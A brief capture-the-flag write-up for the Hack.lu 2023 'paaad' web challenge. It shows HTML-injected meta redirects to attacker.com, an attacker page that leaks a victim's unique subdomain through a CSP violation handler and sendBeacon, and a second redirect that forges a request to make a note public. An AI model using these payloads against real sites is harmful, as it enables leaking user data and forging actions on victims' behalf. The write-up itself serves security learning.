**tl;dr**

\+ meta redirect to attacker website, using the html injection in the paaad.  
\+ leak the unique subdomain with csp violation.  
\+ Another meta redirect csrf with the leaked subdomain to make the note
public.

``First pad``  
```html

<meta http-equiv="refresh" content="1;
url=https://attacker.com/attacker.html">  
```

``https://attacker.com/attacker.html``  
```html  
<html>  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-
viaaa.space;">  
<title>TEST</title>  
</head>

<body>  
<script>  
document.addEventListener('securitypolicyviolation', async function (event) {  
console.log(event)  
navigator.sendBeacon(location.href,event.blockedURI)

});  
</script>  
<iframe src="https://päääd.space/p/latest"></iframe>  
</body>

</html>  
```  
``Second pad``  
```html

<meta http-equiv="refresh" content="1; url=unique_id.xn\--pd-
viaaa.space?edit=isPublic">  
```  

Original writeup (http://blog.bi0s.in/2023/10/16/Web/paaad-
Hack.luCTF20232023/).